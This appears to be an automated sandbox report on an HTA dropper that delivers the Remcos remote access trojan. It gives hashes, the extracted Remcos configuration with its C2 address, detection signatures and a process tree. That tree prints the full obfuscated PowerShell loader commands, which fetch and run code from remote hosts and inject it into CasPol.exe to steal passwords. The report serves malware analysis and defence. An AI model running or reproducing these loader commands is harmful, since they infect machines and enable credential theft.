Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 07:20
Behavioral task
behavioral1
Sample
nicepersonentiretimeimeetwellwithhershebeautiful.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
nicepersonentiretimeimeetwellwithhershebeautiful.hta
Resource
win10v2004-20241007-en
General
-
Target
nicepersonentiretimeimeetwellwithhershebeautiful.hta
-
Size
139KB
-
MD5
bad41547eb584b8e1abcbeecd8b0020c
-
SHA1
da47c40d7a590ae020a8a9ef4a2cbb0be34ce6e4
-
SHA256
dbb09d03e938bfdf95e1a36d363dc9efacd1ddf57e06219b44c7511109da8e46
-
SHA512
4ae8d7c590cc5b6ebd4f2936dadb96b6d8569f0f40810b3cf40d068d9d572240ef5f6fed31dfef13b1ca5c50893ce2f9cece1a604c295362a73d58c8b0f7cc2f
-
SSDEEP
768:tJnUZA+cT/RVeU2Dx6AyZ6LAuAHAUxLcUd1/KUny6yQWa1jn4FaNwkfkP0d1/KUv:t3
Malware Config
Extracted
remcos
RemoteHost
172.245.123.12:8690
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-ET2B3I
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/744-106-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4880-105-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3184-102-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3184-102-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/744-106-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 3080 powershell.exe 17 1532 powershell.exe 18 1532 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3080 powershell.exe 4264 cmd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 1532 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1532 set thread context of 4772 1532 powershell.exe 93 PID 4772 set thread context of 744 4772 CasPol.exe 98 PID 4772 set thread context of 3184 4772 CasPol.exe 99 PID 4772 set thread context of 4880 4772 CasPol.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3080 powershell.exe 3080 powershell.exe 1532 powershell.exe 1532 powershell.exe 4880 CasPol.exe 4880 CasPol.exe 744 CasPol.exe 744 CasPol.exe 744 CasPol.exe 744 CasPol.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 4772 CasPol.exe 4772 CasPol.exe 4772 CasPol.exe 4772 CasPol.exe 4772 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 4880 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4772 CasPol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1928 wrote to memory of 4264 1928 mshta.exe 83 PID 1928 wrote to memory of 4264 1928 mshta.exe 83 PID 1928 wrote to memory of 4264 1928 mshta.exe 83 PID 4264 wrote to memory of 3080 4264 cmd.exe 85 PID 4264 wrote to memory of 3080 4264 cmd.exe 85 PID 4264 wrote to memory of 3080 4264 cmd.exe 85 PID 3080 wrote to memory of 1820 3080 powershell.exe 87 PID 3080 wrote to memory of 1820 3080 powershell.exe 87 PID 3080 wrote to memory of 1820 3080 powershell.exe 87 PID 1820 wrote to memory of 3628 1820 csc.exe 88 PID 1820 wrote to memory of 3628 1820 csc.exe 88 PID 1820 wrote to memory of 3628 1820 csc.exe 88 PID 3080 wrote to memory of 3808 3080 powershell.exe 89 PID 3080 wrote to memory of 3808 3080 powershell.exe 89 PID 3080 wrote to memory of 3808 3080 powershell.exe 89 PID 3808 wrote to memory of 1532 3808 WScript.exe 90 PID 3808 wrote to memory of 1532 3808 WScript.exe 90 PID 3808 wrote to memory of 1532 3808 WScript.exe 90 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 1532 wrote to memory of 4772 1532 powershell.exe 93 PID 4772 wrote to memory of 4128 4772 CasPol.exe 97 PID 4772 wrote to memory of 4128 4772 CasPol.exe 97 PID 4772 wrote to memory of 4128 4772 CasPol.exe 97 PID 4772 wrote to memory of 744 4772 CasPol.exe 98 PID 4772 wrote to memory of 744 4772 CasPol.exe 98 PID 4772 wrote to memory of 744 4772 CasPol.exe 98 PID 4772 wrote to memory of 744 4772 CasPol.exe 98 PID 4772 wrote to memory of 3184 4772 CasPol.exe 99 PID 4772 wrote to memory of 3184 4772 CasPol.exe 99 PID 4772 wrote to memory of 3184 4772 CasPol.exe 99 PID 4772 wrote to memory of 3184 4772 CasPol.exe 99 PID 4772 wrote to memory of 3300 4772 CasPol.exe 100 PID 4772 wrote to memory of 3300 4772 CasPol.exe 100 PID 4772 wrote to memory of 3300 4772 CasPol.exe 100 PID 4772 wrote to memory of 4880 4772 CasPol.exe 101 PID 4772 wrote to memory of 4880 4772 CasPol.exe 101 PID 4772 wrote to memory of 4880 4772 CasPol.exe 101 PID 4772 wrote to memory of 4880 4772 CasPol.exe 101
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicepersonentiretimeimeetwellwithhershebeautiful.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poweRsHEll.eXe -EX bYpass -NOP -w 1 -C deVIcecreDEntIAlDEpLOYMENt ; iNVoKe-exPresSIoN($(INVOkE-EXpResSIoN('[systEm.text.EncOdInG]'+[ChaR]58+[CHar]58+'UTF8.geTStRing([SYstEm.convErt]'+[ChAR]58+[CHaR]0x3a+'frOMbAsE64strINg('+[CHAR]34+'JG1nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRFRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd5SWJTSEpLT2ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPRGpULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDeUR0R2NGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWtHVXVmUVRmcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga0ZJaHMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1NVEVwYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbXpXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG1nOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xMzIvNzY2L25pY2ViYWJ5Z2lybGZvcm1laGF2dmUudElGIiwiJEVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyIsMCwwKTtzdEFSdC1TbEVFUCgzKTtpbnZvS2UtRXhwUmVTc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyI='+[char]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoweRsHEll.eXe -EX bYpass -NOP -w 1 -C deVIcecreDEntIAlDEpLOYMENt ; iNVoKe-exPresSIoN($(INVOkE-EXpResSIoN('[systEm.text.EncOdInG]'+[ChaR]58+[CHar]58+'UTF8.geTStRing([SYstEm.convErt]'+[ChAR]58+[CHaR]0x3a+'frOMbAsE64strINg('+[CHAR]34+'JG1nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRFRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd5SWJTSEpLT2ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPRGpULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDeUR0R2NGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWtHVXVmUVRmcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga0ZJaHMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1NVEVwYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbXpXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG1nOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xMzIvNzY2L25pY2ViYWJ5Z2lybGZvcm1laGF2dmUudElGIiwiJEVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyIsMCwwKTtzdEFSdC1TbEVFUCgzKTtpbnZvS2UtRXhwUmVTc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyI='+[char]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jxeamwc0\jxeamwc0.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95D7.tmp" "c:\Users\Admin\AppData\Local\Temp\jxeamwc0\CSC1E301CD7EB4941459BD4BA99D8BCC463.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3628
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicebabygirlformehavvnicebabygirlformehav.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AZABlAG4AZQBwAHAAYQBoAHMAZwBuAGkAaAB0AGUAcgBvAG0AaAB0AGkAdwBlAGcAYQByAGUAdgBvAGMAZQByAG8AbQAvADYANgA3AC8AMgAzADEALgA4ADcAMQAuADYANAAuADgAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fgsxhlenotbbizrnurrcmrhizaezox"7⤵PID:4128
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fgsxhlenotbbizrnurrcmrhizaezox"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:744
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hiyiiwpocbtflfnrlcevxetzipnihieiu"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\scdaj"7⤵PID:3300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\scdaj"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD520931ed8fc4952fc9a2d670a1e07bb50
SHA16a7698a10e417553dc5d1a71aac77d4f85f0963a
SHA256ce1165856e9df1738ba2b33e01cd120f33a0c715d792a0eaeeb8b6a97da490da
SHA5122b90a50d5c9b0611d154162b789ec3a92446fcd8bd6034f44ab492032d5f84731fbffb2ca97eed36abade334982a0452cd0c207e4aa3ea3cb84ae1842cb27c1c
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5c3f4a28bea462cb9a3c7cbbb686625b7
SHA17bd95a8c35744b49084bcf9b92c62fc28d14e69d
SHA256582c111776481b46b07189eb08ce9d789b1b62b654e73c55c5a846ac6b882182
SHA5126f4477b91c2e84c8f574fcb637a252d9f12100ed3ab4a2cc6ef735a9bef04219c11445add57817d000cb6b5b31f7f2e95af6445fb1335aa27a5183872fd4af86
-
Filesize
1KB
MD583125478b832f5b4df3ee7365f666cc6
SHA1b4eaa7616b8eb08d402dd9d81093d5a68dc57fba
SHA256bf59c5d7f7bfabf7b3647dd368d6d10f1563322b669f669130679c35a58d262c
SHA512e03106ab6b040ad5c5d6b2938826893fc1b071e47ab88ffd31e68cbd5b3a008a1d93e21d216a7a77f4875cde1cc8891b5b5837f3f37c261225028dfdda039a8f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
3KB
MD55e4c85f0f4bd3ec7ae8515b09cafa0d3
SHA12efbfc986f2ec04c388c0497667e6117ca4f3af3
SHA256cd1bd8eae47c4e87c322bb680f39ee56277258df0200675907d6e84d908cd8ae
SHA512432f47ba5ce9b40ecbf867b4f1d91b9e4b920e07cdb74e2194cff01774d56904703c941ea53e163bf001870bc6c7454da998f753dcc4bca54f399ab9a8c3f82d
-
Filesize
229KB
MD5743038855d008d967e70de63d3b6067b
SHA15fe5dfe00823ea779c43a05cf4eca254bc6b448f
SHA256580efebb5dd99c6da0404819e716cf3af6b09bdbb7ea6782fa88a9961e3f4345
SHA5126045292c9df58756092971d7766831df5d84ef27c08c5e2966c506aa8b85707d98289203c8a10717272f7709f197f1ae518a1724abd42ac74fba510db42a211a
-
Filesize
652B
MD5dedaf71391402516103adf324d5e27ce
SHA14fb80c371b65a5d713a66a43149f674f687df74b
SHA256719635f44b7c81b9d3d4281a84a2b78cd9cf8c72958c509792016afba798dde6
SHA512ecce17eb370bb5622d7a4e2b65dc2730eed1b3f62fe68663bf934aa175508df71c538b8fcba72390b4ac292d798798217e197a75d46a4b7909fd54efab428566
-
Filesize
490B
MD55333b2de1c7c92a8d581c3258a05b46d
SHA18ada86459f1209b2111a50084f9821a9341b4707
SHA2567d961f8d55b6caee480f91ebae1e48ec8c17252335128364a255cc564c98f7db
SHA512491136994067164802c4d0d0fc2626590af9849da96d7180e7bd12a1b79e86c1d9e1ca29c06b6375df4b98406ece0c01de55aa6b0bdd2736a0960edbf85d6168
-
Filesize
369B
MD5df75cb25b0dcc45bc95dfdb599588eb6
SHA1f915a60a6b21e4b788816c055df31aa2d766cb79
SHA2566b716957bc0ccdaccf45351bc666de1bcea9ef39b6598f0c6663c86432bcc91d
SHA5120fe87d1641c570acbb480620c400c7f6e22ce290c5485ec1ab21a83a3d86ee9aadbc3ffb456496468a0f6a9dd25519145cd5266324b08f687227fcb87795e8b4